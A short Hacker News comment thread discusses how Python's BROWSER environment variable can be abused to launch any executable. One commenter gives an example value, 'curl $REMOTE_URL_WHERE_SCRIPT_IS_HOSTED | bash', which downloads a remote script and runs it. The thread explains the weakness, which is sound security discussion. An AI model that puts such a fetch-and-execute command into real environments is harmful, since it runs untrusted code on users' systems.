Hacker News
new
|
past
|
comments
|
ask
|
show
|
jobs
|
submit
login
neolog
on July 14, 2020
|
parent
|
context
|
favorite
| on:
Hacking with environment variables
If the environment allows executing a browser, it allows executing a browser. Whether python is involved is irrelevant.
RcouF1uZ4gsC
on July 14, 2020
[–]
> If the environment allows executing a browser
From my reading of this, it allows executing any executable you can put in the BROWSER environment
csunbird
on July 14, 2020
|
parent
|
next
[–]
Which you can set it to something like "curl $REMOTE_URL_WHERE_SCRIPT_IS_HOSTED | bash" and run arbitrary code.
neolog
on July 14, 2020
|
parent
|
prev
[–]
Oh you're right.
Guidelines
|
FAQ
|
Lists
|
API
|
Security
|
Legal
|
Apply to YC
|
Contact
Search: